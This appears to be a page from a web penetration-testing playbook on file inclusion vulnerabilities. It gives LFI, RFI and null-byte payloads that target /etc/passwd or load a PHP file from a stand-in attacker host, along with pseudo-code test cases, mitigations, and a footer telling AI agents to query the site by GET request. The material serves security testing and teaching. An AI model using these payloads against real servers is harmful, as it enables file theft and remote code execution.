# File Inclusion

#### Description

File Inclusion occurs when a web application includes files based on user input without proper validation. This can lead to arbitrary file inclusion, allowing attackers to read sensitive files or execute arbitrary code.

#### Example with Scenario

**Scenario:** A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.

#### Payloads and Test Cases

**Payloads**

1. **Local File Inclusion (LFI):**

   ```
   /include?file=../../../../etc/passwd
   ```
2. **Remote File Inclusion (RFI):**

   ```
   /include?file=http://attacker.com/malicious.php
   ```
3. **Null Byte Injection:**

   ```
   /include?file=../../../../etc/passwd%00
   ```

**Test Cases**

1. **Local File Inclusion (LFI):**
   * **Payload:**

     ```
     /include?file=../../../../etc/passwd
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/include?file=../../../../etc/passwd")
     # Verify if the application includes the /etc/passwd file
     checkFileInclusion("/etc/passwd")
     ```
2. **Remote File Inclusion (RFI):**
   * **Payload:**

     ```
     /include?file=http://attacker.com/malicious.php
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/include?file=http://attacker.com/malicious.php")
     # Verify if the application includes the remote file
     checkRemoteFileInclusion("http://attacker.com/malicious.php")
     ```
3. **Null Byte Injection:**
   * **Payload:**

     ```
     /include?file=../../../../etc/passwd%00
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/include?file=../../../../etc/passwd%00")
     # Verify if the application includes the /etc/passwd file despite null byte
     checkFileInclusion("/etc/passwd")
     ```

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain malicious paths.
   * Use allow-lists to restrict input to expected file paths.
2. **Disable Dynamic Inclusion:**
   * Avoid using dynamic file inclusion based on user input.
   * Use static file paths or mapped identifiers for inclusion.
3. **Limit File Access:**
   * Restrict file access permissions to only necessary files.
   * Use chroot or containerization to limit file system exposure.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing file system structure.
   * Return generic error messages without disclosing sensitive information.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/web-app-pentesting/file-inclusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.